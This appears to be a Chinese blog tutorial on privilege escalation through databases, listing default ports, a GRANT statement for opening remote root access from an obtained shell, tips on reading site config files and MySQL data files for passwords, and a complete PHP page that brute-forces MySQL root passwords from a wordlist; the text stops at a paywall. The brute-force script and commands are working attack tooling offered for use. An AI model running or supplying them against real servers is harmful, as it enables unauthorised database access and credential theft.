思维导图
权限提升
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kkRZchpp-1651235597950)(image60/6.png)]](https://i-blog.csdnimg.cn/blog_migrate/88522383ed3b2a81094cf2a7b5b7ae5a.png)
数据库提权
在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码。除 Access 数据库外,其他数据库基本都存在数据库提权的可能。
- 数据库应用提权在权限提升中的意义
- WEB 或本地环境如何探针数据库应用
- 数据库提权权限用户密码收集等方法
- 目前数据库提权对应的技术及方法等
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sFdvDC4K-1651235597952)(image60/60.png)]](https://i-blog.csdnimg.cn/blog_migrate/2d99923afc346ead68668569f28db616.png)
知识点
提权流程
服务探针---->信息收集----->提权利用----->获取权限
数据库端口号
关系型数据库
Oracle
port:端口号,默认是1521
SQL Server
port:端口号,默认是1433
MySQL
port:端口号,默认是3306
pointbase
port:端口号,默认是9092
DB2
port:端口号,默认是50000
Sybase
port:端口号,默认是5000
PostgreSQL
port:端口号,默认是5432
非关系型的数据库
MongoDB
port:默认端口号,27017
Redis
port:默认端口号,6379
memcached
port:默认端口号,11211
演示案例:
Mysql 数据库提权演示-脚本&MSF
服务器开启了3306 端口,但是不允许root外链的情况,我们可以在shell里面执行如下的语句来开启root用户的外连,方便我们提权。
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '密码' WITH GRANT OPTION;
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;
查看网站配置文件
sql data inc config conn database common include等
- config.php
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-624zoEww-1651235597952)(image60/60-1.png)]](https://i-blog.csdnimg.cn/blog_migrate/27da3b63fa480c057f4ad24cdf9d751f.png)
- conn.info.php
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JPMGi3p9-1651235597953)(image60/60-2.png)]](https://i-blog.csdnimg.cn/blog_migrate/ff8aa3fe4cc4743da29c3ea80fae7a17.png)
- config.ini.php
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zdJ855E2-1651235597953)(image60/60-3.png)]](https://i-blog.csdnimg.cn/blog_migrate/bc61aa98cf53c03faac3bfd037ae76bc.png)
等等一些配置文件
查看数据库存储文件
mysql数据库存储数据文件以myd为后缀文件名
比如xxx.myd
查询
select @@basedir as basePath from dual
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YOfl8NDN-1651235597954)(image60/60-5.png)]](https://i-blog.csdnimg.cn/blog_migrate/90ed06e968befba61bfa6cafac6590fc.png)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KLhLYbn4-1651235597954)(image60/60-6.png)]](https://i-blog.csdnimg.cn/blog_migrate/3a1659eea3136e19640e0488907a488c.png)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AjdhhJUO-1651235597955)(image60/60-4.png)]](https://i-blog.csdnimg.cn/blog_migrate/0fde7a4e07f8b74c15a0c82ceb960196.png)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6c2I5xLT-1651235597955)(image60/60-7.png)]](https://i-blog.csdnimg.cn/blog_migrate/e180995dbc6fdfbf546faf95f9ef6e64.png)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wYPjlKdO-1651235597956)(image60/60-8.png)]](https://i-blog.csdnimg.cn/blog_migrate/5c0f86d65f535ab544370b835b2b60ab.png)
爆破猜解
服务器本地爆破
Completion.php
用法:保存为Completion.php文件,将密码字典放置同目录下为pwd.txt文件,浏览器打开就可使用。
<html>
<head>
<title>Mysql账号密码在线爆破工具</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<center>
<br><br>
<h1>Mysql账号密码在线爆破工具 V2.0</h1>
<br>
<?php
if(@$_POST['submit']){
$host = @$_POST['host'];
if($host!==""){
$username = "root";//用户名字典
$password = array();
$filename = "pwd.txt"; //同目录下密码字典
$i=0;
$file = fopen($filename,'r');
while(! feof($file)){
$password[$i] = fgets($file);
$i++;
}
fclose($file);
echo "<hr><br>-----------------------爆破状态-----------------------<br>";
for ($l=0; $l <= count($password); $l++) {
$password1 = trim($password[$l]); //除去左右空白
if(@mysql_connect($host, $username, $password1)){
echo "<script>alert('数据库密码为:{$password1}')</script>";
echo "<br><br><font color='red'>爆破成功--密码-->".@$password1."</font>";
break;
}else{
continue;
}
}
echo "<br>----------------------爆破结束-----------------------<br><hr>";
}else{
echo "<script>alert('黑客,输入数据库IP地址')</script>";
}
}
?>
<br><br><br><br>
<form action="Completion.php" method="post">
数据库IP地址:<input type="text" name="host"/>
<input type="submit" value="爆破" name="submit"/>
</form>
<center>
</body>
<
最低0.47元/天 解锁文章
扫一扫
1548
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
